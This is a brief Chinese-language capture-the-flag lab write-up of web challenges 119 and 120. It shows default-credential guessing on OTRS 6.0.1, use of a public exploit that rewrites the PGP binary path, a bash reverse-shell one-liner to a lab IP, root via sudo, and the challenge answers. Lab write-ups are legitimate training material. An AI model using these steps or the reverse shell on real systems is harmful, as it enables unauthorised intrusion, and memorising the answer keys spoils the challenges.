Web Range-119-120

# Web Range-119-120 ## Challenge 119 ## Challenge 120 ![image](https://hackmd.io/_uploads/S1VlcqbYgl.png) ![image](https://hackmd.io/_uploads/BkxMS6ZYgl.png) * ip連上後是ubuntu預設頁面, 掃完發現robots.txt跟一個 `otrs` * ![image](https://hackmd.io/_uploads/BJoKqcbKlx.png) * 會被導到一個CMS的頁面, `otrs 6.0.1` * ![image](https://hackmd.io/_uploads/BksCccbYxl.png) * ![image](https://hackmd.io/_uploads/rJKfi5WYxl.png) * 有RCE * ![image](https://hackmd.io/_uploads/BkxHo9bYlx.png) * 似乎要先找到credential * ![image](https://hackmd.io/_uploads/r1rqsc-Fxe.png) * 猜到帳密了, 基本是預設的 * ![image](https://hackmd.io/_uploads/B1erZsWYgx.png) * `root@localhost:password` * Run script後發現連不回來, 仔細看了PoC steps發現路徑稍微不同, 要點進去改 * https://www.exploit-db.com/exploits/43853 * ![image](https://hackmd.io/_uploads/BkVXOhWFeg.png) * PGP路徑改成python, 要拿來reverse shell * ![image](https://hackmd.io/_uploads/rkuEt3-tgg.png) * Command 塞在Option * ![image](https://hackmd.io/_uploads/BkKH93bKlx.png) * python一直找不到正確路徑, 改用bash * ![image](https://hackmd.io/_uploads/BklwxT-Ylg.png) ```zsh= -c 'exec bash -i >& /dev/tcp/172.23.232.2/4444 0>&1' ``` * 修改完後訪問 `?Action=AdminPGP` Got shell as `www-data` * ![image](https://hackmd.io/_uploads/SkNJNaWtex.png) * ![image](https://hackmd.io/_uploads/HkBT7aWFlx.png) * `sudo -i`直接提= = * ![image](https://hackmd.io/_uploads/r1yjVp-Yxl.png) ## Answer * Challenge 119:`password` * Challenge 120:`fb53552b`